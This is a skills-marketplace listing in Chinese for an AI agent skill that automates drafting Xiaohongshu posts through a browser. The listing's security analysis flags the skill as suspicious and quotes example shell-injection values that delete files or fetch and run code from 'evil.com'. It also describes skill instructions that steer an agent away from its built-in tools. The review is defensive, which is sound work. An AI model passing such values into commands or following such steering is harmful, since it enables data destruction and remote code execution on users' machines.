← 返回 Skills 市场
yewenwu1

小红书图文发布

作者 YEWENWU1 · GitHub ↗ · v1.0.0
cross-platform ⚠ suspicious
1200
总下载
1
收藏
7
当前安装
1
版本数
在 OpenClaw 中安装
/install xiaohongshu-mcporter-publish
功能描述
小红书创作者平台写帖子:mcporter 调用 chrome-devtools-mcp 操作浏览器,禁止 browser 工具。上传图片、填写标题正文,发布由用户手动完成。
安全使用建议
This skill appears coherent, but take these practical precautions before installing: 1) Verify the mcporter binary on your system is legitimate and from a trusted source — the skill will invoke it to control your browser. 2) Be aware the agent will run filesystem commands (ls) and access files under the specified Desktop folder to find images — don't store sensitive files in that folder. 3) If you want tighter control, ask the skill author or maintainer for the exact mcporter/devtools commands it will run, or run it manually the first time to observe behavior. 4) Note that the final 'publish' step is left to the user, so posts won't be published automatically without your confirmation.
功能分析
Type: OpenClaw Skill Name: xiaohongshu-mcporter-publish Version: 1.0.0 The `SKILL.md` file contains a significant prompt injection vulnerability by explicitly instructing the AI agent to execute `ls` on user-controlled paths (e.g., `~/Desktop/XX`). This pattern allows for shell injection, potentially leading to arbitrary command execution if a malicious user crafts input like `$(rm -rf /)` or `$(curl evil.com|bash)`. Additionally, the repeated instruction to "禁止 browser 工具" (disable browser tool) is suspicious, as it attempts to steer the agent away from its potentially safer, built-in browser automation tools.
能力评估
Purpose & Capability
The skill's name/description say it will automate Xiaohongshu publishing using mcporter -> chrome-devtools-mcp. Declaring mcporter as a required binary matches that purpose. No unrelated environment variables, credentials, or config paths are requested.
Instruction Scope
The SKILL.md tells the agent to use mcporter to control the browser and to list (ls) a user Desktop folder to locate images for upload. Reading the Desktop to find images is proportional to the task, but the instructions are minimal/ambiguous about exact mcporter commands and give the agent discretion to run devtools operations. A positive control is that final 'publish' is explicitly left to the user, preventing fully automatic posting.
Install Mechanism
This is an instruction-only skill with no install spec and no code files — lowest-risk delivery method. It relies on an existing mcporter binary being present rather than downloading code.
Credentials
No environment variables, credentials, or config paths are requested. Requiring only mcporter is proportionate to a browser-automation publishing task.
Persistence & Privilege
always is false, the skill is user-invocable, and it does not request persistent presence or modify other skill/system configs. Model invocation is allowed (the platform default) but not combined with other concerning flags.
如何使用
  1. 确保已安装 OpenClaw(本地或 Docker 部署)
  2. 在对话框中输入安装命令:/install xiaohongshu-mcporter-publish
  3. 安装完成后,直接呼叫该 Skill 的名称或使用 /xiaohongshu-mcporter-publish 触发
  4. 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.0
Initial release
元数据
Slug xiaohongshu-mcporter-publish
版本 1.0.0
许可证
累计安装 7
当前安装数 7
历史版本数 1
常见问题

小红书图文发布 是什么?

小红书创作者平台写帖子:mcporter 调用 chrome-devtools-mcp 操作浏览器,禁止 browser 工具。上传图片、填写标题正文,发布由用户手动完成。 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 1200 次。

如何安装 小红书图文发布?

在 OpenClaw 或 Claude Code 对话框中运行命令「/install xiaohongshu-mcporter-publish」即可一键安装,无需额外配置。

小红书图文发布 是免费的吗?

是的,小红书图文发布 完全免费(开源免费),可自由下载、安装和使用。

小红书图文发布 支持哪些平台?

小红书图文发布 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。

谁开发了 小红书图文发布?

由 YEWENWU1(@yewenwu1)开发并维护,当前版本 v1.0.0。

💬 留言讨论